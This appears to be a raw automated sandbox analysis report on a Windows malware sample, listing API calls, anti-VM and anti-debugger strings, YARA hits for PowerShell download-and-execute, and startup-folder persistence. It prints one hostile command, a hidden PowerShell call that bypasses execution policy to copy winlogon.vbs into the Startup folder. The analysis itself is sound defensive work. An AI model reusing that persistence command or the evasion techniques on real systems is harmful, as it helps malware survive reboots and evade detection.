Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140058D70 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140058F63h

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400ACC40 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014003C320 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400667A0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140080A40 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140066AE0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,malloc,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400ACB40 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140081030 GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140067130 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AB002E20 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C32E20 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\conhost.exe	File opened: C:\Users\user\AppData

Source: conhost.exe, 00000008.00000002.497989554.000001E6CF86A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWateP
Source: xuXIetZvv6.exe, 00000000.00000002.239795364.000000001BD90000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.498385338.000001E6CFB30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.505935460.000001339D4F0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.494929029.0000027804230000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: conhost.exe, 00000011.00000002.494602074.0000027803F19000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWo
Source: conhost.exe, 00000008.00000002.498144191.000001E6CF8B7000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.264357792.000001339D41A000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.494553119.0000027803F12000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: conhost.exe, 00000011.00000002.494276135.0000027803EC0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWedLo0
Source: xuXIetZvv6.exe, 00000000.00000002.239795364.000000001BD90000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.498385338.000001E6CFB30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.505935460.000001339D4F0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.494929029.0000027804230000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: xuXIetZvv6.exe, 00000000.00000002.239795364.000000001BD90000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.498385338.000001E6CFB30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.505935460.000001339D4F0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.494929029.0000027804230000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp	Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: xuXIetZvv6.exe, 00000000.00000002.239795364.000000001BD90000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.498385338.000001E6CFB30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.505935460.000001339D4F0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.494929029.0000027804230000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140038046 GlobalUnlock,CloseClipboard,GetTickCount,PeekMessageW,GetTickCount,GetTickCount,BlockInput,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400D0790 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\ProgramData\conhost.exe

Code function: 8_2_00007FF7AAFF1E48 GetLastError,IsDebuggerPresent,OutputDebugStringW,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_000000014009E010 SendMessageW,SendMessageW,SendMessageW,LoadLibraryW,GetProcAddress,SendMessageW,SendMessageW,SendMessageW,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400D6D5C GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D2224 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D0790 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400CD404 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFF312C SetUnhandledExceptionFilter,_invalid_parameter_noinfo,
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFF2D00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFF33CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFF35B0 SetUnhandledExceptionFilter,
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFFAE10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C233CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C22D00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C2AE10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C235B0 SetUnhandledExceptionFilter,

Source: C:\Users\user\Desktop\xuXIetZvv6.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell download and execute

Show sources

Source: Yara match	File source: xuXIetZvv6.exe, type: SAMPLE
Source: Yara match	File source: 00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.219734739.00000000007D8000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234484249.00000000007D8000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492055438.000002F0A12B5000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.245936252.00000179B9330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xuXIetZvv6.exe PID: 6348, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6704, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\winlogon.vbs, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs, type: DROPPED
Source: Yara match	File source: 0.2.xuXIetZvv6.exe.8285a2.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.xuXIetZvv6.exe.8285a2.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.xuXIetZvv6.exe.8285a2.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.xuXIetZvv6.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.xuXIetZvv6.exe.6e8636.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.xuXIetZvv6.exe.8285a2.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.xuXIetZvv6.exe.6e8636.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.xuXIetZvv6.exe.6e0000.0.unpack, type: UNPACKEDPE

Bypasses PowerShell execution policy

Show sources

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: \\+\root\securitycenter2=select * from antivirusproduct
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: software\pong
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: plugin
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: saveplugin
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: sendplugin
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: hasheshash
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: plugin.plugin
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: msgpack
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: errorgmasterkey can not be null or empty.-input can not be null.uinvalid message authentication code (mac).
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: {0:d3}
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: {0:x2} +(never used) type $c1e(ext8,ext16,ex32) type $c7,$c8,$c9
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: wrapnonexceptionthrows
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.0.0.0
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.0.0.0e
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ).netframework,version=v4.0,profile=client
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: frameworkdisplayname
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: .net framework 4 client profile
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: _corexemain
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: mscoree.dll
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: _corexemainmscoree.dll
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 4vs_version_info
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: varfileinfo$
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: translation
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: stringfileinfo
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 000004b0
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: comments"
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: companyname*
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: filedescription0
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: fileversion1.0.0.02
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: internalnamestub.exe&
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: legalcopyright*
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: legaltrademarks:
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: originalfilenamestub.exe"
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: productname4
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: productversion1.0.0.08
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: assembly version1.0.0.0
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestversion="1.0">
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <trustinfo xmlns="urn:schemas-microsoft-com:asm.v2">
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <security>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <requestedprivileges>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <requestedexecutionlevel level="asinvoker" uiaccess="false" />
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: </requestedprivileges>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: </security>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: </trustinfo>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <application>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <!-- windows vista -->
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <supportedos id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <!-- windows 7 -->
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <supportedos id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <!-- windows 8 -->
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <supportedos id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <!-- windows 8.1 -->
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <supportedos id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <!-- windows 10 -->
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <supportedos id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: </application>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: </compatibility>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <asmv3:windowssettings xmlns="http://schemas.microsoft.com/smi/2005/windowssettings">
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: <dpiaware>true</dpiaware>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: </asmv3:windowssettings>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: </asmv3:application>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: </assembly>
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: $arg1oq
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: codebase
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: escapedcodebase
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: fullname
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: exportedtypes
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: definedtypes
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: evidence
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: permissionset
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isfullytrusted
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: securityruleset
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: manifestmodule
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: customattributes
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: reflectiononly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: modules
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: imageruntimeversion
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: globalassemblycache
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: hostcontext
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isdynamic
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: createqualifiedname
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: loadfrom
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: reflectiononlyloadfrom
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: unsafeloadfrom
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: reflectiononlyloadxn
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: p{3t
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: loadwithpartialname
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: reflectiononlyload
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: loadfile
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 0\|3t
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getexecutingassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getcallingassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getentryassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: referenceequalshq
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: rawassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: target
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: !system.reflection.runtimeassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: invocableattributectortoken
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: flags
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: syncroot
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: evidencenodemand
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isstrongnameverified
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: $arg1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: $arg2
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: #system.reflection.runtimemethodinfo
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isdynamicallyinvokable
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: invocationflags
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: remotingcache
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: system.iruntimemethodinfo.value
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: reflectedtypeinternal
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: signature
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: bindingflags
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: declaringtype
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: reflectedtype
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: membertype
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: metadatatoken
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: module
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: issecuritycritical
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: issecuritysafecritical
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: issecuritytransparent
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isoverloaded
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: methodhandle
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: attributes
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: callingconvention
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: returntype
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: returntypecustomattributes
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: returnparameter
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isgenericmethod
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isgenericmethoddefinition
